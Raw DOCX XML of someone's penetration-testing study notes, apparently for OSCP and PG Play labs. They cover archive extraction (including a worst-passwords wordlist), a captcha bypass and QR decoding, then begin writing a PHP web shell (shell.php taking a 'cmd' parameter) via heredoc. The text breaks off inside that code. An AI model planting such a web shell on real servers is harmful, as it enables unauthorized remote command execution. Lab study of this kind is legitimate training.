      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_bfgzp4n09lac" w:id="497"/>
      <w:bookmarkEnd w:id="497"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Zip (.zip)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000371B">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000371C">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">In OSCP-A Challenge Lab for machine 192.168.xxx.144, we try unzipping but we it skipped a bunch</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000371D">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="4833484" cy="3338513"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="205" name="image212.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image212.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId1172"/>
                    <a:srcRect b="0" l="0" r="0" t="0"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4833484" cy="3338513"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect"/>
                    <a:ln/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000371E">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000371F">
      <w:pPr>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">When you look up the error "</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">need PK compat. v5.1 (can do v4.6),</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">" you should see that we should use</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> 7z</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> instead of </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">unzip</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003720">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003721">
      <w:pPr>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">7z x sitebackup3.zip</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003722">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="251"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">x stands for extract</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003723">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000037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25">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003726">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_kypfxe1hnmmv" w:id="498"/>
      <w:bookmarkEnd w:id="498"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">gzip (.gz)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003727">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003728">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">If you have a .gz file, then you can unzip it using:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003729">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="385"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">gunzip nameOfFile.gz</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000372A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="385"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">This will remove the .gz file and replace it with the unzipped contents</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000372B">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000037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2D">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_mkkl4gqdgfky" w:id="499"/>
      <w:bookmarkEnd w:id="499"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">.bz2</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000372E">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000372F">
      <w:pPr>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">bunzip2 500-worst-passwords.txt.bz2</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003730">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003731">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Creates a file called </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">500-worst-passwords.txt</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> and deletes the original zip</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000037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33">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003734">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_z8l86ky0406h" w:id="500"/>
      <w:bookmarkEnd w:id="500"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Captcha </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003735">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003736">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">In the </w:t>
      </w:r>
      <w:hyperlink r:id="rId1173">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">BBSCute</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">PG Play, we had a register page with a captcha. But the captcha wouldn't work, possibly on purpose. Like it wouldn't show up on the screen. So, the way to get around this, was to look at the source code, find captcha.php (or something similar), then click on it, and then it will lead you to the captcha.php page, where the code will be displated</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003737">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003738">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003739">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000373A">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000037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3C">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_nkugwkj8jiiw" w:id="501"/>
      <w:bookmarkEnd w:id="501"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">QR Code</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000373D">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000373E">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">In the </w:t>
      </w:r>
      <w:hyperlink r:id="rId1174">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">Vegeta1</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> PG Play, we saw a QR code which was a PNG. We used </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">zbarimg </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">to scan it</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000373F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="721"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">zbarimg &lt;image file&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003740">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003741">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000037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43">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_4i2txbze0ja7" w:id="502"/>
      <w:bookmarkEnd w:id="502"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">How to add multiple lines into file using a single echo command</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003744">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003745">
      <w:pPr>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">cat &lt;&lt;'EOF' &gt; </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">shell.php</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003746">
      <w:pPr>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">&lt;html&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003747">
      <w:pPr>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">&lt;body&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003748">
      <w:pPr>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">&lt;form method="GET" name="&lt;?php echo basename($_SERVER['PHP_SELF']); ?&gt;"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003749">
      <w:pPr>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">&lt;input type="TEXT" name="cmd" autofocus id="cmd" size="80"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000374A">
      <w:pPr>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">&lt;input type="SUBMIT" value="Execute"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000374B">
      <w:pPr>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">&lt;/form&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000374C">
      <w:pPr>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">&lt;pre&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000374D">
      <w:pPr>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">&lt;?php</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000374E">
      <w:pPr>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">    if(isset($_GET['cmd']))</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000374F">
      <w:pPr>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">    {</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003750">
      <w:pPr>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
